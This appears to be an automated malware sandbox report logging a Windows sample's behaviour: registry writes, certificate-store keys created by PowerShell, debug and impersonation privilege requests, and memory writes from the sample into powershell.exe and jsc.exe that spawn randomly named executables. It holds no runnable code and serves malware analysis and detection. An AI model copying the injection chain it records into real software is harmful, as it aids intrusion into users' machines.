Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
N/A N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
N/A N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
N/A N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
N/A N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
N/A N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
N/A N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 716 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4332 wrote to memory of 3172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe
PID 4332 wrote to memory of 3172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe
PID 4332 wrote to memory of 3172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe
PID 4332 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe
PID 4332 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe
PID 4332 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe
PID 4332 wrote to memory of 244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe
PID 4332 wrote to memory of 244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe
PID 4332 wrote to memory of 244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe
PID 4332 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe
PID 4332 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe
PID 4332 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe
PID 4332 wrote to memory of 3936 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe
PID 4332 wrote to memory of 3936 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe
PID 4332 wrote to memory of 3936 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe
PID 4332 wrote to memory of 1140 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe
PID 4332 wrote to memory of 1140 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe
PID 4332 wrote to memory of 4240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe
